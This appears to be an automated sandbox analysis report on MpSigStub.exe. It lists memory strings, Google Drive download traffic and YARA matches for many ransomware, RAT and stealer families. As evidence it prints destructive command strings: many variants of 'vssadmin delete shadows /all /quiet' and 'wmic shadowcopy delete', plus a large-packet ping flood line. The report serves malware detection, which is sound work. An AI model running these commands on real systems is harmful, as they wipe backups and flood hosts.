Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0x equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0xx equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: G"http://www.youtube.com/watch?v=nqpod5at30g" equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	String found in binary or memory: Hping -t -w 1 -l 65500 www.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: YouTube http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: a67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: a67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: dc:\arquivos de programas\internet explorer\iexplore.exe http://www.youtube.com/watch?v=Vjp7vgj119s equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p=http://www.sogou.com/web?sogouhome=&shuru=shou&query=http://so.163.com/search.php?q= equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/srch?set= equals www.rambler.ru (Rambler)
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v= equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: src='http://www.facebook.com/plugins/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: src='http://www.facebook.com/widgets/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: www.hotmail.com equals www.hotmail.com (Hotmail)
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com/ equals www.yahoo.com (Yahoo)

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9gljef6kikngnm2hs1ehcuq6imn5jtp3/1634049300000/00014782062933200622/*/1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-88-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49786 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected LaZagne password dumper

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Linux EvilGnome RC5 key

Show sources

Source: Yara match	File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected VBKeyloggerGeneric

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp

Binary or memory string: DirectDrawCreateEx

Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmp

Binary or memory string: GetRawInputData

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

E-Banking Fraud:

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Njrat

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6277926837.0000028BD7CD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands:

Yara detected BlackMoon Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Ragnarok ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Avaddon Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected BLACKMatter Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Jigsaw

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected GABUTS Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected AESCRYPT Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected RansomwareGeneric

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Ouroboros ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Chaos Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Mock Ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Conti ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd718e899.156.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd718d495.114.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd718fe9d.113.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd718fe9d.155.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd718d495.127.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd718e899.115.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd718e899.128.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd718d495.154.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd718fe9d.129.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6347949598.0000028BD6FAA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6308216657.0000028BD7178000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6324441483.0000028BD7178000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected NoCry Ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected ByteLocker Ransomware

Show sources

Source: Yara match	File source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected RegretLocker Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Clop Ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd67c4b16.150.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected LockBit ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected LOCKFILE ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Cerber ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd745f702.85.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Rhino ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Buran Ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected VHD ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Netwalker ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Jcrypt Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Delta Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected LazParking Ransomware

Show sources

Source: Yara match	File source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Zeppelin Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Apis Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Wannacry ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected MegaCortex Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Cobra Locker ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6430632622.0000028BD7C8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected RekenSom ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Babuk Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Nemty Ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Clay Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Thanos ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected CryLock ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Sapphire Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected OCT Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Snatch Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Silvertor Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Annabelle Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Gocoder ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp, type: MEMORY

Yara detected WannaRen ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Ryuk ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Porn Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected DarkSide Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected HiddenTear ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Mailto ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected CoronaCrypt Ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Voidcrypt Ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6273117492.0000028BD7976000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected GoGoogle ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Axiom Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Artemon Ransomware

Show sources

Source: Yara match	File source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Covid19 Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected LokiLocker Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Cryptolocker ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd67c4b16.150.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Marvel Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Cute Ransomware

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd67c4b16.150.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Xorist ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Found potential ransomware demand text

Show sources

Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: )Decrypting of your files is only possible
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: Decrypting of your files is only possible
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: )Decrypting of your files is only possible]

Deletes shadow drive data (may be related to ransomware)

Show sources

Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp	Binary or memory string: vssadmin Delete Shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6321337544.0000028BD6471000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all /for=
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	Binary or memory string: cmd.exe /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe delete shadows /all /Quiet
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe delete shadows /quiet /all
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all /quiet & wmic shadowcopy delete
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: */C vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	Binary or memory string: 'vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	Binary or memory string: T/c vssadmin.exe Delete Shadows /All /Quiet
